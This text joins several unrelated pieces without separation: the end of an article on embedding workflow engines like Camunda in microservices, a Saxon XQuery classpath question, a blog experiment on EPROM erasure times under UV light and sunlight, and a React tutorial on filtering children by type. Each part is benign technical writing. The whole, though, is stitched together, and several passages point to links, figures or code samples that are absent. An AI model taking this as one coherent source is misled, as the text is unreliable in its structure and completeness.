    .receiveTask().id("wait").name("Wait for new credit card data").message("CreditCardUpdated")
    .boundaryEvent().timerWithDuration("PT7D") // time out after 7 days
    .endEvent().camundaExecutionListenerClass("end", PaymentFailedAdapter.class)
    .moveToActivity("wait").connectTo("charge") // retry with new credit card data
    .moveToActivity("charge")
    .endEvent().camundaExecutionListenerClass("end", PaymentCompletedAdapter.class)
    .done();

Code Snippet 4: The flow logic now allows for a time frame of a week to update credit card data

We will point to some other potentially interesting aspects later in this article, e.g. how to visualize such flows. For now, we summarize that you can leverage such a state machine to handle your state and define powerful flows around state transitions.

Embeddable Workflow

Such a state machine is a simple library that can be embedded into your microservice. In the source code examples provided in this article, you can see how to start the Camunda engine as part of a microservice implemented in Java, which could also be done via Spring Boot or similar frameworks. Let's highlight this: every microservice that implements long running flows must tackle the requirements around flow and state handling. So, should every microservice use an engine like Camunda's? The team responsible for a microservice may decide to, but such a decision will not necessarily be the same across all teams. In a microservices architecture we typically find decentral governance regarding technological choices. A team might very well use a different framework, or even decide to hardcode their flows. Or they might use the same framework, but in different versions.
There isn't necessarily any central component involved when you introduce a workflow engine, and we clearly advocate not imposing unnecessary enterprise architecture standards in a microservice environment. Embeddable also doesn't have to mean that you run the engine in the same process: especially in the polyglot world of microservices, the programming language might not directly fit. In that case you can deploy your engine in a standalone manner and talk to it remotely. This could be done via REST, for example, but more efficient ways are also on the horizon. The important aspect here is that the responsibility for the engine lives with the team owning the surrounding microservice; it's not a centrally provided engine (Figure 3).

Figure 3: Teams decide decentrally to leverage and embed an engine for their flow logic - or not

In the proposed decentralized architecture you have multiple workflow engines, where every single one only sees a part of the overall flow. That poses new requirements on proper process monitoring which aren't yet solved. But depending on the product there are workarounds possible, or you can leverage existing monitoring tools in your microservice universe (like the Elastic stack, for example). It also helps to introduce an artificial transaction id or trace id which you hand over to each and every service invocation in the chain. We plan to write a blog post dedicated to this topic, as it is especially important in the more complex operational environment of collaborating microservices.

The Power of Graphics

"I love code, and I love DSLs. Graphic UIs are terrible" - a statement we often hear when talking to developers. It's understandable, because very often graphical models hinder the way developers like to work, causing what we call "death-by-properties-panel." The models might also hide complex configurations made under the hood.
But this aversion should not stand in the way of an important fact: graphical representations are extremely handy during operations, as you don't have to dig into code to understand the current state or exceptional situations. And you can leverage the graphics to discuss the model with business stakeholders, requirements engineers, operators, or other developers. Often, after discussing and modeling a flow (graphically) in a short workshop, we hear comments like "now I finally understand what we have already been doing for years!" Visibility also makes it easier to change flows down the line, as you know how the flow is currently implemented (don't forget, the flow is running code) and you can easily point to the areas where it should be changed.

With workflow engines you get a graphical representation of the flow. However, we often see one very important aspect missing: being able to define flows not only in a graphical format but also in code or by a simple DSL, as shown above. The code example we gave above can be presented in auto-layout and monitored as shown in the figure below. Many projects we know use graphical models, as they are often easier to follow. This comes in especially handy if you have complex flows including parallel paths, which are hard to understand in code but easy to spot in the graphics. The graphical model is often directly saved in the BPMN 2.0 standard. But we also know of projects using the coded DSL successfully.

Figure 4: The power of graphics - from business users to developers to operations

When building your own end-to-end monitoring solution, you can still easily visualize a graphical flow with lightweight JavaScript frameworks like bpmn.io, as we demonstrate in the code examples. You just read the process models and their current states from the different engines via an API and show all running instances for the already mentioned artificial transaction id.
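The aggregation behind such a monitoring view can be sketched without any particular engine: merge the instance states reported by several engines into one end-to-end picture, keyed by the artificial trace id. All types and names below are invented for illustration; real engines would be queried via their respective APIs.

```java
import java.util.ArrayList;
import java.util.HashMap;
import java.util.List;
import java.util.Map;

// Sketch: merge flow instance states reported by several engines into one
// end-to-end view, keyed by an artificial trace id handed through every
// service invocation in the chain.
public class FlowMonitor {

    public record InstanceState(String engine, String activity) {}

    private final Map<String, List<InstanceState>> byTraceId = new HashMap<>();

    // Each engine reports "trace id X is currently at activity Y"
    public void report(String traceId, String engine, String activity) {
        byTraceId.computeIfAbsent(traceId, k -> new ArrayList<>())
                 .add(new InstanceState(engine, activity));
    }

    // The merged end-to-end view for one business transaction
    public List<InstanceState> trace(String traceId) {
        return byTraceId.getOrDefault(traceId, List.of());
    }

    public static void main(String[] args) {
        FlowMonitor monitor = new FlowMonitor();
        monitor.report("order-4711", "order-engine", "Wait for payment");
        monitor.report("order-4711", "payment-engine", "Charge credit card");
        System.out.println(monitor.trace("order-4711"));
    }
}
```

A real implementation would poll each engine's API (or subscribe to its history events) and could feed the merged states into a bpmn.io rendering, but the core idea is just this correlation by trace id.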
The granularity of the flows shown in monitoring should reflect the event collaborations we introduced earlier, which correspond to events that are meaningful to the domain expert. That makes these flows readable for all kinds of project participants. The flow should actually be seen as part of the domain logic and centered around the ubiquitous language as promoted by DDD. "When exactly do we do the payment?" is then easy to answer for everybody - from business users to developers to operations.

Handle Complex Flow Requirements

As we all know: the devil is in the details. As soon as we leave the cozy island of one single microservice, we don't have atomic transactions at hand, we experience latency and "eventual consistency", and we have to do remote communication with potentially unreliable partners. Developers therefore have to deal with failures a lot - also in regard to business transactions, which can't be carried out as atomic transactions. There is a lot of power in workflow engines for these use cases, especially when using a BPMN tool as introduced. We give an example in Figure 5, using the graphical format this time. We catch the error that goods are not available and trigger a so-called compensation. The compensation mechanism of the engine knows which activities were successfully executed in the past and will automatically execute the defined compensation activities, Refund payment in this case. One can leverage this functionality, which nicely implements the so-called Saga pattern.

Figure 5: In case the ordered goods turn out not to be available, the payment is refunded

Note that the shown logic still lives inside a (potentially very lean) service, the Order Service, whereas other parts of the overall flow will be maintained by the teams responsible for those parts. There is no need for any central controller - the flow logic is distributed.

Why are State Machines not a Commodity for Microservices then?
Existing tools providing the flow logic capabilities needed for long-running services are often named workflow or BPM engines. However, mistakes were made around Business Process Management (BPM) in "the old SOA days" which give it a bad reputation, especially among developers. They expect to get an inflexible, monolithic, developer-adverse and expensive tool which forces them to follow some model-driven, proprietary, zero-code approach. And some BPM vendors really do deliver platforms which are not usable in the microservices universe. But it's important to note that there are lightweight open source engines available which provide an easy-to-use, embeddable state machine, as shown above. You can leverage these tools to handle the flow instead of re-inventing the wheel, saving you time, a very precious commodity as we all know.

One important aspect of overcoming the misconceptions is to take wording seriously. The flows we present here are not necessarily "business processes", particularly if you "just" want to have a bunch of collaborating microservices forming a business transaction. The flows may also not be "workflows", as this is often perceived as involving humans doing some manual work. That's why we often just talk about "flows" - which works fine for different use cases and different stakeholders.

Example code

The use case presented here is not just pure theory. In order to make the concepts concrete and explainable, we developed the order fulfillment example as a working system composed of multiple microservices. You find the source code online on GitHub.

Conclusions

Microservices and event driven architectures go very well together. Event choreographies enable decentral data management, typically decrease coupling, and work well for the kind of long running "background" processes we focus on in this article. Most of the end-to-end flow logic required to support long running business processes should be distributed across the microservices.
Every microservice implements the part of the flow it is responsible for, according to its own business capabilities. We recommend transforming events to commands inside the service responsible for the business decision that something is needed and therefore has to happen. A service responsible for the remaining end-to-end logic can be as lean as possible, but in our minds it is better to have one than to rely on non-transparent and tightly coupled event chains.

For implementing the flow you can leverage existing lightweight state machines and workflow engines. These engines can be embedded into your microservice, avoiding any central tool or central governance. You can see them as a library helping the developer. As a bonus, you get graphical representations of the flow, helping you throughout your project. You might have to overcome some common misconceptions about workflow or BPM in your company, but believe us, it's worth it!

About the Authors

Bernd Rücker has helped many customers implement business logic centered around long running flows, for example the order fulfillment process of the rapidly growing start-up Zalando, selling clothes worldwide, or the provisioning process for e.g. SIM cards at a couple of big telecommunication companies. During that time he contributed to various open source projects, wrote two books and co-founded Camunda. Currently he thinks about how flows will be implemented in next generation architectures.

Martin Schimak has been into long running flows for 15 years, in fields as diverse as energy trading, wind tunnel organization and contract management for telecommunication companies. As a coder, he has a soft spot for readable APIs and testable specs and has made manifold contributions on GitHub. As a domain "decoder", he is on a first name basis with Domain-Driven Design as well as BPMN, DMN and CMMN. He is also co-editor of the German software magazine OBJEKTspektrum.
Comments

SAM Pattern by Jean-Jacques Dubray

Thank you for such a precise and complete article on the topic. I am not sure if you ever came across or considered using the SAM Pattern for orchestration. Classical State Machines (Petri Nets) tend to have some issues. TLA+ offers a much better foundation for this kind of state machine. I created a couple of years ago a Java and JavaScript library (someone is actually currently porting it to C#). I would not recommend using "Sagas" or "Workflow". This is a small example that illustrates how the library works. The main advantage of SAM is that it gives you a robust state machine structure, in code. No need to use a different language. Even better, the state machine structure is nearly invisible to the developer.

AsyncAPI specification by Francisco Méndez Vilas

Great! by Leonardo Rafaeli

Question: How scalable is Camunda? Assuming I spawn loads of containers, will Camunda work well with parallel processing? Or will it centralize all workflow instance information into a single server?

Re: Great! by Bernd Ruecker

Camunda is very scalable; we have big customers using it in huge scenarios. The limitation of the current architecture is the relational database used underneath. So you can spawn a lot of containers and work can be perfectly distributed, but a logical cluster meets on the database, which can become the bottleneck in very high-load scenarios. The few customers who face this use logical shards to run multiple logical Camunda instances. With microservices, every microservice can quite naturally become a shard on its own, easing the load on the various Camunda instances very much. So this typically is no problem.
If you still worry about scalability, one additional hint: we are working on a next generation engine which implements persistence differently (basically using event sourcing). We will release the first version and put it open source next month - stay tuned :-)

Cheers
Bernd

Re: Great! by Martin Schimak

Many thanks for your encouragement. :-) As it's out now, I'll add the link to the new open source project Bernd was referring to in his answer: zeebe.io/

Cheers, Martin.
Hi,

I am using XQuery as part of my Java application. I have a need to define namespaces and some commonly used functions in an XQuery file which would be packaged in a jar. This file would then be imported by other XQueries. However, the imported file would have to be loaded from the classpath. I came across an open source implementation which does this. The link is.

A brief description of the way they do it: if the XQuery module is part of a Java application, it might also be an option to pack the module into a Java archive (.jar file) along with the Java classes and use the following import to load the module from a Java package:

import module namespace status="" at "resource:org/exist/xquery/lib/test.xqm";

I think it'd be really great to have this feature as part of Saxon as well. Thanks.

Regards,
Kaizer

Ivan Toshkov 2008-05-16

One way to do that in Saxon is to create a subclass of ModuleURIResolver, which can handle loading XQueries off of the CLASSPATH.
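As a follow-up sketch of that suggestion: Saxon's hook for this is the ModuleURIResolver interface, whose resolve method returns sources for the requested module locations. The core trick, mapping a "resource:" style location onto the classpath, can be shown without any Saxon dependency; the "resource:" scheme follows the eXist convention quoted above, and the class name here is purely illustrative.

```java
import java.io.InputStream;

// Sketch: map a "resource:" location URI onto the classpath.
// In Saxon you would perform this lookup inside a ModuleURIResolver
// implementation and return the stream wrapped in a StreamSource.
public class ClasspathModuleLoader {

    static final String SCHEME = "resource:";

    // Turn "resource:org/example/lib/common.xqm" into a classpath path.
    public static String toClasspathPath(String location) {
        if (!location.startsWith(SCHEME)) {
            throw new IllegalArgumentException("not a resource: URI: " + location);
        }
        return location.substring(SCHEME.length());
    }

    // Open the module text from the classpath (null if absent).
    public static InputStream open(String location) {
        return ClasspathModuleLoader.class.getClassLoader()
                .getResourceAsStream(toClasspathPath(location));
    }

    public static void main(String[] args) {
        System.out.println(toClasspathPath("resource:org/exist/xquery/lib/test.xqm"));
    }
}
```

Wiring this into Saxon then amounts to registering your resolver on the Configuration so that module imports using the custom scheme are routed through it.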
I've always been fascinated by the beauty of EPROM chips, with their erasure windows giving you a clear look inside the package. Because of this fascination, I ended up buying quite a few chips, a UV eraser that needed some repairing, and a programmer. With these items on hand, one of the often asked questions I could finally answer for myself was: "how long does it really take to erase an EPROM?"

The Science of Erasure

I'll start off by saying that I'm no expert when it comes to the device physics of EPROMs, but in a nutshell, an EPROM works by first being programmed, which causes charge to accumulate in a region separated from the bulk of the material by an oxide insulator, forming the programmed state. Erasing the EPROM requires external UV light of 400nm or shorter wavelength to ionize the oxide, allowing the stored charge to dissipate and reverting the cell to the unprogrammed state. The process causes damage over repeated cycles.

Programming generally aims to store sufficient charge in each cell to be detectable, plus a small margin to ensure data retention in case of extremely slow leakage and/or different voltage/temperature operating conditions.

If we look at two examples of erasure procedures from datasheets (AMD AM27C040 on the left, ST M27C64A on the right), we can see that the dose needed to erase the unit is often claimed to be 15W.sec/cm² or 30W.sec/cm². The time is claimed to be 15-20 minutes or 30-35 minutes under a lamp of 12000μW/cm² power rating. To most people, this looks like gobbledygook. You don't go into a shop and ask for a lamp with a 12000μW/cm² power rating, for one, and why so complicated? Why not 12mW/cm² (which is equivalent, with a lot fewer zeros)? Why not 30J/cm² (which is equivalent to 30W.sec/cm²)? Maybe the reasoning has been lost on me because I wasn't a technician in the late 70's ... I wasn't even born, but it just seems peculiar and oddly specific. Instead, let's work the problem the reverse way.
Let's first work out what the power rating of a regular G5 4W eraser tube would be. Thanks to Philips, their datasheet gives us virtually everything we need to know.

Tube Output -> 0.9W UV-C
Tube Length -> 13.59cm (including caps)
Tube Diameter -> 1.6cm

Tube Surface Area: π × 1.6 × 13.59 = 68.31 cm²
Output Flux: 0.9 / 68.31 = 0.013175 W/cm² = 13.175 mW/cm²

Aha! As it turns out, we've been sitting on a lamp with a power rating of 13175μW/cm² all along. Actually, it's probably slightly higher, since the length includes the opaque caps where no radiation is emitted, so the total radiated power is concentrated into a slightly shorter length. Knowing this, you could just take the suggested times and use them with your 4W eraser, as the power is pretty much "close enough". But if we want to do the math ...

15W.sec/cm² = 15 / 0.013175 = 1138.5 s = 18 minutes 58 seconds
30W.sec/cm² = (above result) × 2 = 37 minutes 57 seconds

This corresponds fairly well to the suggested time frames, although with a few minutes of difference. In actuality, depending on the condition of the EPROMs, time to erasure can probably be even shorter. The reason is that the specification sheets are often more conservative than necessary, to ensure that every part is erased sufficiently, and probably incorporate a margin. You could probably save some damage to the chips by shortening the erasure time, at the risk of "incomplete" erasure if you don't expose them long enough.

Erasure Experiment Preparation

In order to prepare for the experiment, a single candidate of each type of EPROM (eight in total) was selected and programmed with the TL866CS programmer with all cells set to 0x00 (programmed state). The cells were verified, the window was cleaned with isopropyl alcohol, and then the chips were individually exposed to their method of erasure.
The TL866CS was used to read out and save the contents of the ROM after each period of erasure, and the erasure was repeated until the chip was erased completely (all cells 0xFF) or the test was aborted. All chips, with the exception of the M27C64A, managed to take a program the first time. Unfortunately, the M27C64A appeared to be defective, with an inability to check its ID or verify after programming on the TL866CS.

The M27C64A datasheet was consulted in regards to programming. It appears that the MiniPro programmer was using the right strategy, although with a slightly higher Vcc for verify. However, I'm not certain that the pulse delay feature is set correctly, as the claimed algorithm has 100uS pulses applied until the data verifies correctly. I suppose a longer delay shouldn't harm anything though.

Desperate to get the chip to operate, and curious as to how it got sold to me as "working" when it was so obviously problematic, I decided to tinker with the settings. I changed the programming voltage to 16V, which resulted in the lower byte programming successfully. This gave me some hope, but was a gross overvoltage. I pushed it another notch. At the maximum voltage of 21V, the chip programmed successfully and survived without permanent and instant damage. It seems that the Chip ID has changed to reflect the data on the chip as well - indicating that the chip probably doesn't have ID circuitry, or if it does, it's not functioning correctly. This may be a counterfeit remarked chip of the wrong type, or a damaged chip of some sort. Regardless, it was used in testing in this state.

Practical Erasure under 4W Tube

The first step was to determine how long it would take to erase the EPROMs under the 4W UV tube. Each chip was separately exposed in 30 second blocks by using a remote switch, and then the data was read out until the chip was completely blank or I had reached the limit of my patience (15 minutes).
Each of the dumped ROM files was processed to determine the number of set bits (erased bits) using a simple C program leveraging the inbuilt popcount function of GCC (see Appendix A). While in the post about the eraser itself I looked at a single EPROM and made an animated GIF of it, I didn't go to that length for these chips. Part of the reason was that many of the chips had so many cells in them that it wouldn't be feasible to make web-resolution GIFs available (they'd be huge), and because, by and large, the erasure trends weren't significantly different. Instead, I've provided an image of the 'roughly' half-way erased point so that the patterns can be seen, using the same conversion methodology.

The time based results were as follows: the erasure of the chips can be seen to follow an initial phase of (generally) no bit changes. This may indicate that charge leakage has occurred, but is insufficient to change the status of the bit. This phase indicates the amount of excess charge stored during the programming phase, and thus the EPROM's resistance to "bit rot", assuming equally leaky insulating layers. After the charge has depleted sufficiently, a rapid rise to nearly completely erased follows. This means that the "bulk" population of cells has identical qualities (i.e. charge retained, insulating oxide leakiness, exposure to UV). This is followed by a (potentially) long period where a remaining minority of cells are slowly erased. This may be because of physical obscuring by dirt, scratches on the window, or cell structure/manufacturing defects.

The amount of margin does appear to vary with the type of EPROM, but all types were erased (with the exception of the big M27C2001) in 720s or less, which is significantly below the datasheet recommended doses.
This is probably because the datasheets recommend extra erasure to ensure full charge depletion, improving the margin between 0 and 1 for reliability reasons and ensuring the validity of data under all specified Vcc and temperature conditions. I would recommend exposing for longer than the time required to show full erasure.

The traumatized M27C64A (left) showed the smallest amount of margin, erasing almost immediately on exposure to the UV-C light. The erasure pattern shows some vertical bands, but is mostly scattered throughout. The next most sensitive was the M2716 (right). It seems these are older technology, lower density chips, and their sensitivity could be related to the larger per-cell area meaning more UV energy per cell and faster erasure (assuming the accumulated charge and charge level requirements stay the same). This one showed significant vertical bands of unerased areas, possibly alluding to structural differences or differences in UV exposure, which can come about due to lens shape and the mounting alignment of the chip.

The third most sensitive chip was the M27C4001, a relatively large capacity chip. It had vertical patterns as well, although it also had one stripe which was a bit "out of pattern". The earlier cells seemed to erase better than the later cells.

The remaining chips were mostly clustered together for erasure times. The M27C2001 (Small) and M27C801 had almost identical profiles when it came to the rapid-rise portion of the graph. The M27C2001 (Small) had the most prominent vertical lines, where the cells in between were mostly erased but those cells were more "programmed" or difficult to erase by comparison. The M27C801 proved even more odd, with both vertical bands (strong), horizontal bands (moderate) and an area in the top left corner where it was consistently more difficult to erase.
This may reflect the fact that the M27C801 is a very large device, and the portions of circuitry that make up the chip may have been imaged separately, or made up of several "slices" with slight differences in alignment or design. Or maybe it reflects its prior usage and abuse in programming or erasure.

The next chip in the sequence is the AM27C040, which didn't rise as quickly (suggesting there was some variance in the dose requirements of cells). It seems to have some vertical band repetition, but with semi-random noise in the distribution of erasure patterns. The M27C512 showed some areas of easy erasure (horizontal bands) interspersed with bands of difficult erasure (vertical bands). The M27C2001 (Big) seemed to show some interesting vertical bands (thin) and some "patches" of easy erasure (near the top and bottom corners). It kinda looks like a greyscale bad-photocopy when zoomed out.

In all, the EPROM erasure process shows that the cells don't all erase at the same rate for various reasons, and depending on how the cells are plotted (stride length across, order), this can reveal odd periodicity patterns which probably reflect the physical structure of the memory array. A bit of technical art, I suppose.

Practical Erasure under the Sun?

As EPROM erasure can occur in the presence of 400nm and shorter wavelengths, a widely available source of such light is natural sunlight. Indeed, people have reported erasing EPROMs under sunlight, and datasheets warn against exposure to artificial fluorescent light or sunlight because of the possibility of slow erasure. I wanted to know just how long it would take to erase using the sun, so the first thing I did was to try to estimate this based on data that is available. If you use IEC60904-3 Ed.2 (2008), the reference solar spectral irradiance data is generated by NREL SMARTS.
Table 1 gives the cumulative integrated irradiance from shorter wavelengths to longer wavelengths, normalized to 1000W/m² or “approximately” noon-time irradiation. At 400nm, the cumulative integrated irradiance is 45.97W/m². This can be converted to 4.597mW/cm². Depending on your atmospheric conditions, weather, latitude and obstructions, the amount of “peak sun hours” you get in a day can vary, as can the UV content. In my case, I would estimate about 3 PSH per day because of obstructions, so the total dose is about 13.791mJ/cm²/day. This means that in one second under the 4W eraser tube, we get the same amount of usable UV as you would expect for a day under sunlight. To erase a 15W.sec/cm² EPROM would take 1087 days (2.978 years) or twice as long for a 30W.sec/cm². This would be an impractical method of quickly erasing EPROMs, however, people online have reported erasure as quickly as in days to a week. This might be because the UV content in sunlight is really hard to estimate reliably based on models, but more likely, that the EPROMs may be affected by wavelengths slightly above the 400nm cut-off as well. Whatever the case is, I really wanted to see just how long it would take by experimental means. I chose the M27C64A (a potentially dud, but easy to erase chip) and the M27C801 (a large, averagely difficult to erase chip) to see just how long it would take. These chips had all cells programmed (0x00), windows cleaned with isopropyl alcohol, and sat in a breadboard outside in the backyard in a horizontal position. Every day (or few days in the later cases), the chips were returned inside briefly to be read-out until the chips showed full erasure (all cells 0xFF). As it turns out, this was a major reason why this post took so long to put online. The M27C801 only finally had all cells erased after 107 days, whereas the “easy” chip managed to clear-out after just 6 days. 
It seems that sunlight is stronger than the SMARTS based prediction indicated, especially noting that during the test period, we had some severe rain storms and it was winter in Sydney. Of course, it’s worth noting that EEPROMs which just return erased condition may not be entirely reliably erased especially if the Vcc varies or the read-out conditions change (I’ve had dissimilar readouts one after another for some borderline cells), so additional irradiation is needed to ensure full erasure (just as in when using the tube-based eraser). With the chips, it seemed the erasure followed a similar trend with the UV tube, with the majority of cells erasing in a smallish window of time, but with remaining “tough” cells taking significantly longer to clear. The M27C64A (day 3, left) showed a mostly even erasure profile with a few vertical bands noted. This probably reflects the structure of the chip internally and is similar to the tube based erasure results. The M27C801 (day 32, below) showed some differences compared to the tube based erasure, with the four vertical bands being much lighter, and the presence of new dark horizontal bands. This probably reflects some shadowing due to the large die and correspondingly sized window. I have a feeling that the M27C801 may have erased faster if the placement was more optimized. Because it was laying horizontally on the ground, and its window clearance to the size of the chip was relatively small, the angle of the sun may have caused portions of the chip to be shadowed for a good portion of the day, meaning that the dose received in those cells is only a small fraction of that received by the other cells (exaggerated in the drawing below). Tilting your chip towards the sun, so that the radiation goes through the window perpendicularly during noon-time may optimize the exposure of the cells and result in faster erasure. 
Conclusion

It was determined that the “so called” 12000μW/cm² lamp is basically the low-pressure mercury UV germicidal tube that is employed by many erasers. By working out the flux from a 4W G5 tube, it was found that the emission was close to (slightly above) the level required by datasheets, so their claimed times should be applicable to these erasers. The actual time to report erasure was generally <=720s for EPROMs which were good. One unit failed to erase completely after 900s; however, it may be restored after even further exposure and may have been an outlier (potentially due to settled dirt inside the chamber).

Sun-based erasure was investigated with SMARTS, which predicted 3-year-plus times to erasure. In practical cases, it appeared that 4 months was enough for the average-case EPROM, with the weak one erasing within a week. Sunlight erasure can be practical depending on the EPROM, although tilting the alignment of the EPROM towards the sun will probably improve erasure speed by avoiding shadowing.

To ensure reliability, erasure beyond the point where a device returns 0xFF may be necessary – the amount is probably up for discussion, but at least now I know the minimum amount of exposure time necessary to expect a clean EPROM, and thus might be able to avoid excessive damage to chips when it comes to write-erase cycling them.

Appendix: Counting Set Bits

This is a short program intended for compilation with GCC to count the number of set bits in the input (stdin) and print the result to stdout.

    #include <stdio.h>

    int main(void)
    {
        int cchar;
        int accumulated = 0;

        for (cchar = getchar(); cchar != EOF; cchar = getchar())
            accumulated += __builtin_popcount(cchar);

        printf("%d", accumulated);
        return 0;
    }

Try googling around for some of the history of population count instructions in computer hardware (particularly early “supercomputers”).
Hint: they are a favorite of all the Three Letter Agencies…

That gave me a chuckle … but yes, they seemed to like it for cryptanalysis and statistical analysis reasons, having dedicated hardware abilities for very rapid/efficient processing. Luckily I’m not particularly worried about efficiency – it’s a very useful instruction (or compiler built-in library function), especially when you’re just not bothered with writing a few lines of shifts and masks to do it crudely, or think even harder to optimize it. This reference seems to be the go when it comes to bit twiddling:

– Gough

I’m giving my age away here, but I left the naked eproms from my Microbee computer in the sun for a year to see what would happen. I made copies of them first, of course, and the copies were running in the computer. After all that time, I swapped them back, and everything still worked. They were 2732 types, as I recall. And yet, the UV eraser would erase them in about 15 minutes. I haven’t come across mention of Microbee anywhere in the blog; look it up, nice little Z-80 computer, made in Sydney. Mine had 64k of static RAM (6116), unheard of at the time.
http://goughlui.com/2016/09/11/experiment-time-to-eprom-erasure-by-uv-lamp-sun/
Find & Filter React Children By Type

Take control of your children in React for all environments

Article Update: I’ve decided to rewrite these utils from the ground up, add a bunch of new ones (including deep/recursive searching) and publish an NPM package for all to consume:

This article will discuss the how-it-works for finding and filtering React children by type as it pertains to custom component children. If you are looking at finding and filtering core HTML Element (JSX Intrinsic Element) children like divs, spans, etc., please use react-nanny or see my other article for the how-it-works.

There are situations in which knowing the type of each child passed to your component would be incredibly useful. For example, you might want to:

- Validate that the consumer provides markup that you expect
- Conditionally show or hide child items
- Simplify the use of your component by allowing your consumer to pass in several children, but you want to place one of a certain type in a different location of your output JSX than the rest

The task seems like it should be easy enough to accomplish. After all, if you were to console.log(children), you’d see there’s a type key on each child. An internet search will uncover that you can easily do this:

React.Children.toArray(children).map(x => console.log(x.type.name));

Let’s say we need to create a List component that accepts several ToDo components as children like this:

And we define our components like this:

We map over the children in List.jsx just like our internet search told us. Then we run our app and see the following in the console:

ToDo
ToDo
ToDo

We got exactly what we were looking for, so we begin coding away… validating here; conditionally showing/hiding there.
Our PR gets merged and we think to ourselves, “Self, you really nailed it today.” However, we’re about to be in for a big surprise: It doesn’t work like we expect in production.

So what’s the problem? If we were to run the same map and console.log in production, we’d see something like this:

u
u
u

It turns out that our app’s build has been optimized for production which includes… wait for it… minification! All of our component names and types have now been minified to something completely unpredictable that we can’t code against.

Out of the darkness comes a solution! We can take advantage of the fact that literal string values do not get minified. Simply add a prop that you don’t advertise in your documentation and treat it as a constant. I’ve named it __TYPE in the example below, but you can name it whatever you like. Then give it a default value by defining it via defaultProps.

If we were to now rewrite that mapping that we did at the top of this article to this:

React.Children.toArray(children).map(x => console.log(x.props.__TYPE));

We would get this result in our console in all environments:

ToDo
ToDo
ToDo

I know what you’re thinking because I can read your thoughts, “What’s stopping the consumer from doing something like the following…?”

<ToDo __TYPE="MoreLikeToDontAmirite?" />

The truth is that there really isn’t anything stopping the consumer from doing that. However, we’ve done two things that should immediately discourage people from doing this:

- The prop name starts with not one, but two underscores which should indicate that this is definitely a private prop.
- The prop name is in all caps which should indicate that it is a constant.

Of course we can and should do more.
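The idea can be exercised outside React with plain objects standing in for elements. The names below are illustrative (not the article's exact gists); in real code you would write JSX and React would merge defaultProps for you:

```javascript
// A stand-in component carrying a literal, minification-proof type prop.
const ToDo = () => null;
ToDo.defaultProps = { __TYPE: 'ToDo' };

// Crude stand-in for React.createElement's defaultProps merging.
const createElement = (Comp, props = {}) => ({
  type: Comp,
  props: { ...(Comp.defaultProps || {}), ...props },
});

const el = createElement(ToDo, { title: 'Item 1' });

// The function name may be mangled in a production build,
// but the string prop survives untouched.
console.log(el.props.__TYPE); // 'ToDo'
```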
We can take advantage of the fact that we can create a custom PropType that will notify the user with an in-your-face console error should they attempt to stray from the default:

If we now update the ToDo.jsx component to consume this custom prop validator like this:

…we should see the following in our console if we try to pass in a value for __TYPE in our App.jsx:

Validate Your Children

The List.jsx component, as it stands, can accept any child you throw into it, but that’s not desired behavior. For example, we don’t want someone to be able to pass in a div:

We cannot stand for this kind of thing! Now that we can identify our children, we create another util to handle this situation for us. Consider the following:

We feed the getChildrenByType function our children and an array of the types we want to include, and the function will return only the children that have a matching __TYPE.

The typeOfComponent helper function will check for our __TYPE under the hood. If that isn’t defined, it will next check the stringified type of the component, which is helpful for finding HTML element children (i.e. divs, spans, etc.). If you’re interested in filtering those kinds of children, you can find the link to my other article at the top. Otherwise, you can ignore the details of type for now.

That means we can update our List.jsx component with this function:

When we run the updated code, we’ll notice that our list is nice and clean without the bogus div our consumer so carelessly injected.

Note: If we’re using react-nanny, we can alternatively pass in the actual imported component as part of our types array if it’s in scope:

import ToDo from './components/ToDo';
...
<ul>{getChildrenByType(children, [ToDo])}</ul>

Notice ToDo isn’t a string like it was before. However, if you don’t have your component in scope, you’ll definitely want to key off of a prop value like __TYPE and use a string value in your array.
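A minimal sketch of the two utils in plain JavaScript can make the mechanics concrete. The element shapes below are stand-ins, and the real react-nanny implementations handle more cases:

```javascript
// Sketch of typeOfComponent: prefer the literal __TYPE prop, then fall back
// to the stringified type for intrinsic elements like 'div'.
const typeOfComponent = (child) =>
  (child && child.props && child.props.__TYPE) ||
  (child && typeof child.type === 'string' ? child.type : undefined);

// Sketch of getChildrenByType: keep only children whose type is in `types`.
const getChildrenByType = (children, types) =>
  [].concat(children).filter((child) => types.indexOf(typeOfComponent(child)) !== -1);

// Children as a consumer might pass them: three ToDos and a rogue div.
const children = [
  { type: 'li', props: { __TYPE: 'ToDo', title: 'Item 1' } },
  { type: 'li', props: { __TYPE: 'ToDo', title: 'Item 2' } },
  { type: 'div', props: {} },
  { type: 'li', props: { __TYPE: 'ToDo', title: 'Item 3' } },
];

console.log(getChildrenByType(children, ['ToDo']).length); // 3 — the div is filtered out
```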
Conditionally Show/Hide Specific Children

Sometimes you may want to show or hide specific children, or children of a certain type, based on the configuration of the parent component. To illustrate this, let’s create a new type of ToDo called ToDoCompleted which adds “- COMPLETED” to the end of the item:

Next, we can add a new prop to our List.jsx component called hideCompleted which will conditionally hide or show completed todo items in the list. We can also conditionally add the ToDoCompleted type to the array that we’re passing to our getChildrenByType util function:

If we now update our App.jsx to this:

…and start our app, we will see this:

If we were to add the hideCompleted prop to our list like this:

<List hideCompleted>

…we will see Item 2 removed from the list:

Move Your Children Around

Let’s say that the design team comes to us and says that all of the app’s todo lists should have completed items at the bottom of the list when they are to be displayed. We can accomplish this in List.jsx with our same util function:

In the code above, we’re finding all ToDo children and all ToDoCompleted children and rendering each of those out instead of all children like we were before. However, if someone were to want the completed items hidden, they can still do that. If we start up our app, we should see Item 2 at the bottom:

Why not simply use render props?

I’m glad you asked. I am not anti-render prop. In fact, I use them quite frequently, but they aren’t a golden hammer solution for every problem. If you take our previous scenario with being required to move completed items to the bottom of the list, that was not an initial requirement. It was a requirement that was brought to us after the component already existed.
In this case, we could refactor the component to accept a prop called renderCompleted that returns the completed items, and we can invoke that function in the spot in our render markup where we want those items to be, but we will be breaking the props API contract, which will necessitate action from all consumers. If the component source code lives in our app, we’d have to refactor every instance where it’s used. If the component is part of a distributed package, we’d have to publish a new major version which consumers would manually need to update, in addition to refactoring every used instance. Meanwhile, you have some teams using the new and some using the old, which can create a strange experience for the user as they use your product.

In situations like that, it’s better to use this method and herd the children where they need to be. No breaking change; no consumer refactoring required.

Speaking of render props (since you brought it up)…

These techniques aren’t just for children; they also work with render props or any JSX for that matter. Let’s say you have a component with a render prop called renderActionArea and you expect that prop to return you one or more PrimaryButton components. How do you know the consumer is returning a PrimaryButton and not a div or a span or a SecondaryButton? Well, now you can! Simply…

const actionArea = getChildrenByType(renderActionArea(), ['PrimaryButton']);

Awesome! Do you have any other helpful utils?

Yes! To recap the article update posted at the top, I’ve published an NPM package that has these utils re-engineered to handle additional situations and offer more options to give you flexibility.
